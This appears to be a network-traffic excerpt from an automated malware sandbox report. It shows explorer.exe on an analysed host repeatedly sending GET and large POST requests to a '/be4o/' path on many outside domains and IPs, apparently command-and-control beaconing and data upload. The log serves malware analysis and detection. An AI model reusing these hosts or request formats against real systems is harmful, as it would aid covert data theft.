                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.11.20 | 49781 | 154.23.172.38 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:51:35.362416983 CET | 8962 | OUT | GET /be4o/?h48Hl=2H0l+vSkOseleOGxaYuOAM6EcVRszlgpd1g39MbiOsu7jwlookSoZaEGSOy4tzpz9QV3&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.7bkj.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
Feb 21, 2022 16:51:35.528933048 CET | 8963 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:51:35 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Set-Cookie: security_session_verify=a89d9fee5fcc7c3745bbd54a26506816; expires=Thu, 24-Feb-22 23:51:35 GMT; path=/; HttpOnly
                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
50 | 192.168.11.20 | 49851 | 45.195.115.71 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:55:59.386236906 CET | 11196 | OUT | POST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.rsxrsh.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.rsxrsh.com
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.rsxrsh.com/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
Feb 21, 2022 16:55:59.386334896 CET | 11207 | OUT
Feb 21, 2022 16:55:59.552423000 CET | 11208 | OUT
Feb 21, 2022 16:55:59.552561045 CET | 11225 | OUT
Feb 21, 2022 16:55:59.552639008 CET | 11228 | OUT
Feb 21, 2022 16:55:59.553036928 CET | 11229 | OUT
Feb 21, 2022 16:55:59.553215981 CET | 11233 | OUT
Feb 21, 2022 16:55:59.718512058 CET | 11239 | OUT
Feb 21, 2022 16:55:59.718641996 CET | 11245 | OUT
Feb 21, 2022 16:55:59.718839884 CET | 11252 | OUT
Feb 21, 2022 16:55:59.718993902 CET | 11255 | OUT


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
51 | 192.168.11.20 | 49852 | 45.195.115.71 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:55:59.557224989 CET | 11234 | OUT | GET /be4o/?h48Hl=Tpp8LERQoafeDPvT4B0Z2/EHkXBIuz7bjHlQVU8N2p3tpS82PcmIpc4MoLsyxaBwDc0d&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.rsxrsh.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
Feb 21, 2022 16:56:00.123399019 CET | 11370 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                              Server: nginx/1.20.1
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:56:00 GMT
                                                                                                                                                                                                                              Content-Type: text/html; charset=gbk
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              X-Powered-By: PHP/5.6.40
                                                                                                                                                                                                                              Location: /404.html
                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
52 | 192.168.11.20 | 49854 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:56:05.086414099 CET | 11383 | OUT | POST /be4o/ HTTP/1.1
Host: www.noireimpactcollective.net
Connection: close
Content-Length: 174831
Cache-Control: no-cache
Origin: http://www.noireimpactcollective.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.noireimpactcollective.net/be4o/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Feb 21, 2022 16:56:05.257427931 CET | 11559 | IN | HTTP/1.1 405 Not Allowed
Server: openresty
Date: Mon, 21 Feb 2022 15:56:05 GMT
Content-Type: text/html
Content-Length: 154
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_CbjudUiBjCW5Ca4At5kMqgpefCGUlUMhFy81qXT6n7567CytrZGaq0zum65/Z+hg0KTAtZmTvVBtpROPYlF2QA
Via: 1.1 google
Connection: close
Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
53 | 192.168.11.20 | 49855 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:56:05.097593069 CET | 11407 | OUT | GET /be4o/?h48Hl=vWcq0X33Y2hBfiL/bHeP0RWtqtuntvM4ehZwLUMPr58K+hEeg2YqRGCwATn/AzHlKLs2&GXqXh=YZ_XN0 HTTP/1.1
Host: www.noireimpactcollective.net
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 21, 2022 16:56:05.268443108 CET | 11559 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Mon, 21 Feb 2022 15:56:05 GMT
Content-Type: text/html
Content-Length: 275
ETag: "61fc6928-113"
Via: 1.1 google
Connection: close
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
54 | 192.168.11.20 | 49856 | 35.214.4.70 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:56:15.377640963 CET | 11563 | OUT | POST /be4o/ HTTP/1.1
Host: www.ooo-club.com
Connection: close
Content-Length: 174831
Cache-Control: no-cache
Origin: http://www.ooo-club.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.ooo-club.com/be4o/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Feb 21, 2022 16:56:15.377743959 CET | 11574 | OUT |
Feb 21, 2022 16:56:15.400630951 CET | 11575 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 21 Feb 2022 15:56:15 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.ooo-club.com/be4o/
Host-Header: 8441280b0c35cbc1147f8ba998a563a7
X-HTTPS-Enforce: 1
X-Proxy-Cache-Info: DT:1
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Feb 21, 2022 16:56:15.400695086 CET | 11577 | OUT |
Feb 21, 2022 16:56:15.400868893 CET | 11583 | OUT |


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
55 | 192.168.11.20 | 49857 | 35.214.4.70 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:56:15.403493881 CET | 11584 | OUT | GET /be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN0 HTTP/1.1
Host: www.ooo-club.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 21, 2022 16:56:15.428601980 CET | 11585 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 21 Feb 2022 15:56:15 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.ooo-club.com/be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN0
Host-Header: 8441280b0c35cbc1147f8ba998a563a7
X-HTTPS-Enforce: 1
X-Proxy-Cache-Info: DT:1
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
56 | 192.168.11.20 | 49860 | 64.32.22.102 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:56:38.806749105 CET | 11611 | OUT | GET /be4o/?h48Hl=hsW7O5325DRqN8YWXiUPXnAvYseB+yx3cLX7/2SBrZaiZrW5cMIJApIhTGhmYfsvRNMR&iVP=6lL026g HTTP/1.1
Host: www.brainymortgage.info
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 21, 2022 16:56:38.964276075 CET | 11611 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Mon, 21 Feb 2022 15:56:38 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: http://www.brainymortgage.info?h48Hl=hsW7O5325DRqN8YWXiUPXnAvYseB+yx3cLX7/2SBrZaiZrW5cMIJApIhTGhmYfsvRNMR&iVP=6lL026g
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
57 | 192.168.11.20 | 49863 | 217.160.0.98 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:56:57.580063105 CET | 11638 | OUT | GET /be4o/?h48Hl=MXCJfAiixaQW23gb43srtNqd5bs2JuRcGlYNxDXnDFPSUKLWpR3/CyWyuFSDkL8/v7KL&iVP=6lL026g HTTP/1.1
Host: www.janhenningsen.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 21, 2022 16:56:57.600548983 CET | 11639 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 601
Connection: close
Date: Mon, 21 Feb 2022 15:56:57 GMT
Server: Apache
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
58 | 192.168.11.20 | 49864 | 35.214.4.70 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:57:02.635396004 CET | 11639 | OUT | GET /be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&iVP=6lL026g HTTP/1.1
                                                                                                                                                                                                                              Host: www.ooo-club.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
Feb 21, 2022 16:57:02.658315897 CET | 11640 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:57:02 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Location: https://www.ooo-club.com/be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&iVP=6lL026g
                                                                                                                                                                                                                              Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                              X-HTTPS-Enforce: 1
                                                                                                                                                                                                                              X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
59 | 192.168.11.20 | 49865 | 66.29.154.157 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:57:07.829157114 CET | 11641 | OUT | GET /be4o/?h48Hl=CBV85lUl5iGXXllmWETcgzTRYTuU0jkLI/xLLa4RVPF6HDjlZoPpCKC/374THXhEpvSN&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.buresdx.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
Feb 21, 2022 16:57:08.047563076 CET | 11641 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:57:07 GMT
                                                                                                                                                                                                                              Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                              Content-Length: 277
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.buresdx.com Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.11.20 | 49782 | 95.179.246.125 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:51:40.742798090 CET | 8964 | OUT | GET /be4o/?h48Hl=ZACv9IykpsLcwv8F8kwPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPVVacpXBvcfu&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.waktuk.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
Feb 21, 2022 16:51:40.756628990 CET | 8964 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:51:40 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Location: https://waktuk.com/be4o/?h48Hl=ZACv9IykpsLcwv8F8kwPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPVVacpXBvcfu&GXqXh=YZ_XN0
                                                                                                                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
60 | 192.168.11.20 | 49868 | 23.227.38.74 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:57:25.839608908 CET | 11667 | OUT | GET /be4o/?h48Hl=jq9b4c7BaMhD9kdTAddwzOt+LNN1qoIISHwx1xbT8oPDlt6nx7w14q7WGmdhUJs/cSrW&iVP=6lL026g HTTP/1.1
                                                                                                                                                                                                                              Host: www.kaikkistore.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
Feb 21, 2022 16:57:25.887648106 CET | 11669 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:57:25 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              X-Sorting-Hat-PodId: 215
                                                                                                                                                                                                                              X-Sorting-Hat-ShopId: 59546730662
                                                                                                                                                                                                                              X-Dc: gcp-europe-west1
                                                                                                                                                                                                                              X-Request-ID: e8a9a7ce-56d1-4369-a2f3-2ed7528383da
                                                                                                                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                              X-Download-Options: noopen
                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 6e112b9c8aa56961-FRA
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                              Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;al
Feb 21, 2022 16:57:25.887728930 CET | 11670 | IN | Data Raw: 69 67 6e 2d 69 74 65 6d 73 3a 73 74 61 72 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 36 72 65 6d 7d 2e 61 63 74 69 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 41 39 41 39 41 39 3b 70 61 64 64 69 6e 67 3a 31 2e 32 72
                                                                                                                                                                                                                              Data Ascii: ign-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{borde
Feb 21, 2022 16:57:25.887780905 CET | 11672 | IN | Data Raw: 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 6f 20 74 69 65 6e 65 73 20 70 65 72 6d 69 73 6f 20 70 61 72 61 20 61 63 63 65 64 65 72 20 61 20 65 73 74 61 20 70 c3 a1 67 69 6e 61 20 77 65 62 22 0a 20 20 7d 2c 0a 20 20 22 6b 6f 22 3a
                                                                                                                                                                                                                              Data Ascii: "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": " " }, "da": { "title": "
Feb 21, 2022 16:57:25.887833118 CET | 11673 | IN | Data Raw: 86 e0 a4 aa e0 a4 95 e0 a5 8b 20 e0 a4 87 e0 a4 b8 20 e0 a4 b5 e0 a5 87 e0 a4 ac e0 a4 b8 e0 a4 be e0 a4 87 e0 a4 9f 20 e0 a4 a4 e0 a4 95 20 e0 a4 aa e0 a4 b9 e0 a5 81 e0 a4 82 e0 a4 9a 20 e0 a4 aa e0 a5 8d e0 a4 b0 e0 a4 be e0 a4 aa e0 a5 8d e0
                                                                                                                                                                                                                              Data Ascii: " }, "ja": { "title": "", "content-title": "
Feb 21, 2022 16:57:25.887897015 CET | 11673 | IN | Data Raw: 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 29 20 7b 0a 20 20 20 20 74 61 72 67 65 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 5b 64 61 74 61 2d 69 31 38 6e 3d 22 20 2b 20 69 64 20 2b 20 22 5d 22 29 3b 0a 20 20
                                                                                                                                                                                                                              Data Ascii: translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } // Replace title tage document.title = translations["title"]; // Replace
Feb 21, 2022 16:57:25.887955904 CET | 11673 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
61 | 192.168.11.20 | 49869 | 185.190.39.52 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:57:36.095345974 CET | 11675 | OUT | GET /be4o/?h48Hl=3gaGgvCHlfs+sPey4wEISFn1QJRwzcaNyq85jGUXFNKJ+AEleqZoXJJYcNbcoOST9cbz&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.dreamintelligent.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:57:36.622030020 CET11675INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                              X-Redirect-By: WordPress
                                                                                                                                                                                                                              Location: https://www.dreamintelligent.com/be4o/?h48Hl=3gaGgvCHlfs+sPey4wEISFn1QJRwzcaNyq85jGUXFNKJ+AEleqZoXJJYcNbcoOST9cbz&GXqXh=YZ_XN0
                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:57:36 GMT
                                                                                                                                                                                                                              Server: LiteSpeed
                                                                                                                                                                                                                              Vary: User-Agent


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
62 | 192.168.11.20 | 49870 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:57:41.629331112 CET | 11676 | OUT | GET /be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&GXqXh=YZ_XN0 HTTP/1.1
Host: www.josiemaran-supernatural.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 21, 2022 16:57:41.798185110 CET | 11677 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Mon, 21 Feb 2022 15:57:41 GMT
Content-Type: text/html
Content-Length: 275
ETag: "61fc68f2-113"
Via: 1.1 google
Connection: close
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
63 | 192.168.11.20 | 49871 | 45.195.115.71 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:57:46.972162008 CET | 11677 | OUT | GET /be4o/?h48Hl=Tpp8LERQoafeDPvT4B0Z2/EHkXBIuz7bjHlQVU8N2p3tpS82PcmIpc4MoLsyxaBwDc0d&GXqXh=YZ_XN0 HTTP/1.1
Host: www.rsxrsh.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 21, 2022 16:57:47.555888891 CET | 11678 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.20.1
Date: Mon, 21 Feb 2022 15:57:47 GMT
Content-Type: text/html; charset=gbk
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.6.40
Location: /404.html
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
64 | 192.168.11.20 | 49872 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:57:52.499147892 CET | 11678 | OUT | GET /be4o/?h48Hl=vWcq0X33Y2hBfiL/bHeP0RWtqtuntvM4ehZwLUMPr58K+hEeg2YqRGCwATn/AzHlKLs2&GXqXh=YZ_XN0 HTTP/1.1
Host: www.noireimpactcollective.net
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 21, 2022 16:57:52.668587923 CET | 11679 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Mon, 21 Feb 2022 15:57:52 GMT
Content-Type: text/html
Content-Length: 275
ETag: "620175f5-113"
Via: 1.1 google
Connection: close
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
65 | 192.168.11.20 | 49875 | 35.214.4.70 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:58:02.716633081 CET | 11705 | OUT | GET /be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN0 HTTP/1.1
Host: www.ooo-club.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 21, 2022 16:58:02.739197969 CET | 11705 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 21 Feb 2022 15:58:02 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.ooo-club.com/be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN0
Host-Header: 8441280b0c35cbc1147f8ba998a563a7
X-HTTPS-Enforce: 1
X-Proxy-Cache-Info: DT:1
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.11.20 | 49783 | 38.143.0.82 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:51:45.956650972 CET | 8965 | OUT | GET /be4o/?h48Hl=yMGLhnyeH19jbN+jTVkumEksJ3u99HITZ4h1J3SKUgKf5+hZ4WRN7xEsij25EKwk4NjG&GXqXh=YZ_XN0 HTTP/1.1
Host: www.quanqiu55555.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 21, 2022 16:51:46.115190029 CET | 8966 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
